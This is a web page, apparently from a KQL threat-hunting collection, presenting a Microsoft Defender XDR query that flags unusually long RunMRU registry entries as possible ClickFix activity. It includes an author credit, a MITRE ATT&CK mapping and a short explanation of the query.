Run MRU Click Fix Detection

# *RunMRU ClickFix Detection* ## Query Information #### MITRE ATT&CK Technique(s) | Technique ID | Title | Link | | --- | --- | --- | | T1012 | Query Registry | https://attack.mitre.org/techniques/T1012/ | #### Description This rule detects modifications to the 'RunMRU' registry key, specifically looking for new or changed entries where the command string is unusually long (greater than 50 characters). This can indicate an attempt to persist or execute malicious code via the RunMRU list, which stores recently executed commands. #### Author <Optional> - **Name: Benjamin Zulliger** - **Github: https://github.com/benscha/KQLAdvancedHunting** - **LinkedIn: https://www.linkedin.com/in/benjamin-zulliger/** #### References - https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html ## Defender XDR ```KQL // ClickFix: Discovery of RunMRU Command DeviceRegistryEvents | where Timestamp >= ago(7d) | where ActionType == "RegistryValueSet" | where RegistryKey has @"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" | extend RunCommand = RegistryValueData | extend RunCommandLength = strlen(RunCommand) | where RunCommandLength > 50 // Exclusions | where not(RunCommand has_any ( "SAMPLE1", "SAMPLE2")) ```

Explanation

This query is designed to detect potentially suspicious activity involving the Windows registry, specifically focusing on the 'RunMRU' key, which tracks recently executed commands. The query looks for any changes to this registry key within the past week. It specifically flags entries where the command string is unusually long (more than 50 characters), as this could indicate an attempt to execute or persist malicious code. The query also excludes certain known benign commands ("SAMPLE1" and "SAMPLE2") from being flagged. This detection method is associated with the MITRE ATT&CK technique T1012, which involves querying the registry for malicious purposes.

KQL Search

Run MRU Click Fix Detection

Query

Explanation

Details

Actions